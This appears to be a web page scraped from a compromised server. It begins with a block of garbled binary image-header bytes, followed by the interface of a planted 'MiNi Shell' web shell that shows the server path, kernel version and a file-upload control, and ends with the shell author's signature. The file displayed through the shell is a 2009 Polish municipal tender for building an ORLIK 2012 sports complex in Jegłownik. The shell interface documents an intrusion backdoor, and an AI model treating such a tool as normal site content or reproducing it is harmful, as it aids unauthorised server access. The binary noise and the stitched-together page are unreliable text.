JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090420/111778-N-2009.html

<p class="kh_header"><b>Gronowo Elbląskie: Budowa kompleksu sportowego w ramach programu Moje Boisko ORLIK 2012 przy Szkole Podstawowej w Jegłowniku</b><br>
<b>Numer ogłoszenia: 111778 - 2009; data zamieszczenia: 20.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gronowo Elbląskie , ul. Łączności 3, 82-335 Gronowo Elbląskie, woj. warmińsko-mazurskie, tel. 055 2315623, faks 055 2315623.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu sportowego w ramach programu Moje Boisko ORLIK 2012 przy Szkole Podstawowej w Jegłowniku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia; budowa zespołu boisk i urządzeń sportowych z modułowym systemowym budynkiem zaplecza boisk ORLIK 2012.Zakres inwestycji obejmuje:
- budowę boiska do piłki nożnej - nawierzchnia syntetyczna,
- budowę boiska do koszykówki i siatkówki - nawierzchnia syntetyczna,
- budowę zaplecza boisk,
- budowę ciągu komunikacyjnego,
- budowę oświetlenia boisk z naświetlaczami i instalacją odgromową,
- budowę ogrodzenia terenu z bramą wjazdową i furtką wejściową,
- budowę infrastruktury technicznej podziemnej - wg opracowania indywidualnego, zgodnie z decyzjami i  warunkami miejscowymi.
- odwodnienie wgłębne - drenaż,
- przebudowa sieci wodociągowej,
- przyłącza wod.-kan.
Boisko do piłki nożnej:  o wymiarach: szerokość 26,99 m+2x2m wybiegi + 30 m, długość: 56,00 m+2x3m wybiegi + 62 m, powierzchnia całkowita 1860,00 m2, nawierzchnia z trawy syntetycznej o parametrach technicznych:  wysokość włókna: min. 60 mm, ciężar włókna: min. 15 000 Dtex, ilość włókien: min. 143 000 włókien /m2, gęstość: min. 8900 pęczków/m2, grubość włókna: 100-150 mikronów, struktura włókna: proste fibrylowane-monofilowe w jednym pęczku, skład chemiczny włókna: 100 % polietylen, ciężar całkowity nawierzchni min. 2 900 gr/m2.
Dokumenty i certyfikaty, które należy dołączyć do składanej oferty w celu udokumentowania dobrej jakości produktu są wymienione w Rozdziale V § 1 pkt 4b .
Wyposażenie sportowe: bramki aluminiowe (5x2m) montowane w tulejach - 2 szt., siatki do bramek - 2 szt. 
Boisko syntetyczne do gry w koszykówkę i siatkówkę o wymiarach: szerokość 15,10m+2x2m wybiegi = 19,10 m, długość 28,10m+2x2m wybiegi = 32,10m, nawierzchnia Poliuretan min. grubość 14 mm, warstwa ET min. grubość 35 mm(warstwa elastyczna).
Dokumenty i certyfikaty, które należy dołączyć do składanej oferty w celu udokumentowania dobrej jakości produktu są wymienione w Rozdziale V § 1 pkt 4 a.
Wyposażenie sportowe: do koszykówki:  stojak stalowy ocynkowany regulowany o wysięgu 160cm, tablica 180x105cm, obręcz uchylna, siateczka do obręczy. Ilość: 4 zestawy, do siatkówki:  słupki stalowe montowane w tulejach z regulacją wysokości mocowania siatki i mechanizmem naciągowym, siatka całosezonowa. Ilość 2 zestawy.
Zaplecze boisk sportowych:
Powierzchnia zabudowy: 55,75 m2, powierzchnia użytkowa podstawowa 34,92 m2, kubatura 183,65 m3.Przeznaczenie obiektu i program użytkowy -TYP STANDARD + wersja uniwersalna zestawienia pawilonów, posiadająca poza pomieszczeniami trenera, magazynem, sanitariatami, 2x2 przebieralnie z łazienkami przeznaczone dla dwóch drużyn na jednym z boisk lub każda szatnia dla innego boiska, od organizacji zajęć zależy sposób wykorzystania i podziału na płci, wersja ta posiada wariant     z zadaszeniem- pergolę.
Powierzchnie utwardzone: ciągi komunikacyjne i powierzchnia przeznaczona na kontenery(na odpady stałe) - kostka betonowa gr. Min. 6 cm, w kolorze szarym, na podbudowie z piasku i kruszywa, zamknięte obrzeżem betonowym.
Wyposażenie - oświetlenie boisk: boisko piłkarskie : maszt - słup stożkowy o wysokości minimum 9,00 m z fundamentem i poprzeczkami na projektory oraz instalacja odgromową, boisko do koszykówki i siatkówki: maszt - słup stożkowy o wysokości 9,00 m z fundamentem i  poprzeczkami na projektory oraz instalacją odgromową.
Ogrodzenie terenu na słupkach stalowych mocowanych na podmurówce betonowej. Wypełnienie z siatki stalowej lub ogrodzenia panelowego. Wysokość min. 4 m. Rozstaw słupków do min. 2 m do max. 5 m. Furtki i bramy systemowe przesuwane lub rozwierane, możliwość otwierania bramy za pomocą siłowników elektrycznych. Szerokość furtki od 1 do 2 m, bramy od 2,5 do 4,5 m, wysokość do wyboru. Piłkochwyty o wysokości min. 6 m.
Warunki ochrony przeciwpożarowej - zgodnie z WT § 212 określającym klasy odporności pożarowej budynków i § 213 klasy odporności pożarowej budynków oraz § 213 pkt 2a(zmniejszenie odporności ogniowej) nie dotyczą budynków wolnostojących do dwóch kondygnacji nadziemnych włącznie o kubaturze do 1500 m3 przeznaczonych do celów turystyki i wypoczynku. 
Kanalizacja odwodnienia- drenaż do celów szybkiego odprowadzenia wód wsiąkających w płytę boiska proponuje się wykonanie systematycznej płytki sieci drenażowej. Nawierzchnię płyty boisk projektuje się jako syntetyczną . W celu zapewnienia spływu wód powierzchniowych przewiduje się wykonanie nawierzchni płyty boisk o nachyleniu dwuspadowym od 0.4%-1% w kierunku projektowanych zbieraczy drenarskich - szczegóły zgodnie z projektem budowlanym sieci sanitarne załącznik do SIWZ.
Przebudowa sieci wodociągowej  i  przyłącza wod.-kan. należy wykonać zgodnie z projektem budowlanym sieci sanitarne załącznik do SIWZ.
2. Zakres przedmiotu zamówienia obejmuje ponadto:
   - organizację i zabezpieczenie placu budowy,
   - obsługę geodezyjną w trakcie realizacji robót,
   - inwentaryzację geodezyjną powykonawczą,
   - uporządkowanie i uprzątnięcie placu budowy oraz sąsiednich posesji po   
     zakończeniu robót.
Wszystkie w/w prace winny być wykonane zgodnie z dokumentacją projektową i Specyfikacją Techniczną Wykonania i Odbioru Robót załączoną do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.33.00.00-9, 45.31.00.00-3, 45.31.61.00-6, 45.34.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 105.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 30.000 zł zgodnie z warunkami w SIWZ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie ubiegać się mogą Wykonawcy, którzy:
  1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
  2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania powyższych warunków zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dokumentów dołączonych do oferty zgodnie z Rozdziałem V § 1.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający żąda od Wykonawców w celu potwierdzenia spełniania wymaganych warunków udziału w postępowaniu oraz ustalenia osoby (osób) uprawnionej (nych) do ich reprezentowania, następujących niezbędnych oświadczeń i dokumentów:
1. Wypełniony i podpisany przez osob(ę)y upoważnion(ą)e do składania oświadczeń woli w imieniu Wykonawcy formularz ofertowy, czyli stronę tytułową oferty wg. załączonego WZORU OFERTY  - zał. nr 1 do SIWZ;	                           				
2. Oświadczenie Wykonawca wynikające z art. 24 ust. 1 i 2 i art. 22 ust. 1 ustawy Prawo zamówień publicznych  - zał. nr 2 do SIW;
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawionej nie wcześniej niż 6 miesiące przed upływem terminu składania ofert. W przypadku składania wspólnej oferty przez kilku Wykonawców, niniejszy dokument musi złożyć każdy Wykonawca .
4. W celu potwierdzenia, że oferowane materiały odpowiadają wymaganiom określonym przez Zamawiającego do oferty należy dołączyć:
a) dokumenty dotyczące nawierzchni poliuretanowej:
    - badania na zgodność z normą PN-EN 14877, lub aprobata techniczna ITB, 
       lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego    
       laboratorium badającego nawierzchnię sportowe np.: Labosport.
    - karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta,
    - atest PZH dla oferowanej nawierzchni,
    - autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla 
      Wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji 
      udzielonej przez producenta na tą nawierzchnię.
b) dokumenty dotyczące nawierzchni z trawy syntetycznej:
    - badania na zgodność z normą PN-EN 15330-1, lub aprobata techniczna ITB, 
      lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego 
      laboratorium  badającego nawierzchnie sportowe np.: Labosport,
    - certyfikat FIFA(1 Star lub 2 Star) dla obiektów wykonanego z oferowanego 
      systemu nawierzchni, lub wyniki badań laboratoryjnych potwierdzające 
      zgodności parametrów oferowanego systemu nawierzchni z wymogami FIFA.
    -  karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta,
    - atest PZH dla oferowanej nawierzchni,
    - autoryzacja producenta trawy syntetycznej, wystawiona dla Wykonawcy na 
       realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez 
       producenta na tą nawierzchnię.
5. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robót budowlanych stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania  oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Zamawiający uzna warunek za spełniony jeżeli  Wykonawca w w/w okresie wykona co najmniej jedną robotę budowlaną w zakresie wykonania kompleksu sportowego w tym: budowa boiska z nawierzchnią z trawy sztucznej, boiska z nawierzchnia poliuretanową (wykonane w ramach jednej lub dwóch umów)  - zał. nr 3 do SIWZ;
6. Wykaz osób (tylko kadra kierownicza), którymi dysponuje lub będzie dysponował 
Wykonawca i które będą uczestniczyć w wykonania zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także wykonywanych przez nich czynności oraz uprawnienia  i zaświadczenia tych osób - zał. nr 4 do SIWZ;
7. Polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od 
odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN; 
8. W przypadku ustanowienia prze Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię.  Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych   z postępowaniem o udzielenie zamówienia publicznego, a szczególności podpisania oferty i jej złożenia.
9.W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku 
wykonawców(konsorcjum) - Wykonawca winien załączyć do oferty pełnomocnictwo 
podpisane przez wszystkie podmioty wchodzące w skład konsorcjum, złożony w formie oryginału lub notarialnej potwierdzonej kopii. Z treści pełnomocnictwa musza wynikać jednoznacznie zapisy i ustalenia w zakresie 
      - uczestników konsorcjum (wyszczególnienie wszystkich uczestników jako 
        partnerów)
      - wskazanie lidera konsorcjum wraz z upoważnieniem do reprezentowania 
        pozostałych uczestników konsorcjum w postępowaniu o udzielenie niniejszego 
        zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w 
        sprawie zamówienia. 
      -określenie celu zawarcia konsorcjum(dla wspólnego przygotowania i złożenia 
        oferty, a następnie realizacji niniejszego zamówienia);
10. Dowód wniesienia wadium;
11. Wykaz podwykonawców przewidzianych do realizacji zamówienia  - zał. nr 5 do SIWZ;
12.  Projekt umowy - zał. nr 6 do SIWZ.
13. Kosztorys ofertowy opracowany metodą kalkulacji szczegółowej lub uproszczonej zgodnie z Rozporządzeniem Ministra Rozwoju Regionalnego i Budownictwa z dnia 13 lipca 2001 r. w sprawie metod kosztorysowania obiektów i robót budowlanych(dz. U. nr 80, poz. 867);.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.warmia.mazury.pl/gronowo_elblaskie_gmina_wiejska/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać:bip.warmia.mazury.pl/gronowo_elblaskie_gmina_wiejska/.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2009 godzina 10:00, miejsce: Oferty można składać w Urzędzie Gminy Gronowo Elbląskie, 82-335 Gronowo Elbląskie ul. Łaczności 3, pokój nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com